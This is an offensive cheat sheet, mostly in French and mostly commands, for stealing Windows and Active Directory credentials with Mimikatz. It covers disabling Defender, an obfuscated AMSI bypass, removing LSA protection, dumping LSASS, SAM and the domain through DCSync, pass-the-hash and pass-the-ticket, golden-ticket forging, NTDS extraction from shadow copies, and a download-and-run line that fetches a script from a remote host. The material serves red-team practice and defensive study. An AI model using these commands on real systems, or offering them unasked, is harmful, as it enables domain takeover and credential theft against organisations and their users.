Préparation de l’environnement Exécution en tant qu’administrateur 1 2 3 4 Start-Process PowerShell_ISE -Verb RunAs Add-MpPreference -ExclusionPath "C:\Temp" Set-MpPreference -DisableRealtimeMonitoring $true Import-Module C:\Temp\Invoke-Mimikatz.ps1
Si windows defender ne peut pas être désactivé, faire un AMSI Bypass 1 S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
Ou avec une commande sur amsi.fail
Bypass LSA protection Si les protections de LSA sont activées, le lacement de mimikatz déclent l’erreur suivante :
1 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
On peut alors essayer de contourner ces protections avec ces deux étapes :
1. Chargement des drivers mimidrv dans la mémoire : 1 2 3 4 5 mimikatz # !+ [*] 'mimidrv' service not present [+] 'mimidrv' service successfully registered [+] 'mimidrv' service ACL to everyone [+] 'mimidrv' service startedmimikatz #
Suppression de la protection LSA 1 2 3 mimikatz # !processprotect /process:lsass.exe /remove Process : lsass.exe PID 528 -> 00/00 [0-0-0]
Dumping credentials Méthode basique 1 Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Dump du credential manager 1 2 Invoke-Mimikatz -Command '"vault::cred /patch"' Invoke-Mimikatz -Command '"sekurlsa::credman"'
Autres modules 1 2 Invoke-Mimikatz -Command '"lsadump::sam"' Invoke-Mimikatz -Command '"lsadump::cache"'
Pass-the-hash 1 Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NTLM_HASH> /run:powershell_ise.exe"'
Pass the ticket Export tickets : 1 Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Inject ticket : 1 Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'
View or clear tickets: Remote Credential Dumping 1 2 Invoke-Command –ScriptBlock {Set-MpPreference –DisableRealtimeMonitoring $true} –ComputerName TargetHost Invoke-Mimikatz -DumpCreds -ComputerName TargetHost
DCSync Attack Dump krbtgt hash: 1 Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\\krbtgt"'
Dump all domain hashes: 1 Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /domain:test.local /all /csv"' | Export-Csv .\AllHashes.csv
Golden Ticket Forging 1 Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:<hash> /user:Administrator /id:500 /ptt"'
To save and reuse the ticket later: 1 2 kerberos::golden /ticket:golden.kirbi kerberos::ptt golden.kirbi
Trust Escalation via Golden Ticket 1 2 Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.local /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust_tkt.kirbi"' Invoke-Mimikatz -Command '"kerberos::ptt trust_tkt.kirbi"'
MiniDump LSASS Without Touching LSASS Directly 1 rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
Then in Mimikatz: 1 2 sekurlsa::minidump C:\Temp\lsass.dmp sekurlsa::logonpasswords
Check LSA Protection Status 1 reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
If the value is **0x1**, protection is enabled.
Obfuscated Invoke-Mimikatz for AV Evasion Download and run:
1 IEX (New-Object Net.WebClient).DownloadString('http://<yourhost>/Invoke-Mimikatz.ps1')
Then call commands in obfuscated way:
1 Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))
Dump Credentials via Volume Shadow Copy Create shadow copy:
1 wmic shadowcopy call create Volume='C:\'
Find available shadow copies:
Copy NTDS and SYSTEM:
1 2 copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit" C:\Temp\ntds.dit copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Temp\SYSTEM
Parse using impacket:
1 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
SafetyKatz — Obfuscated Mimikatz variant designed to bypass modern EDR solutions.**Rubeus →**Powerful Kerberos abuse toolkit for ticket extraction, overpass-the-hash, and more.
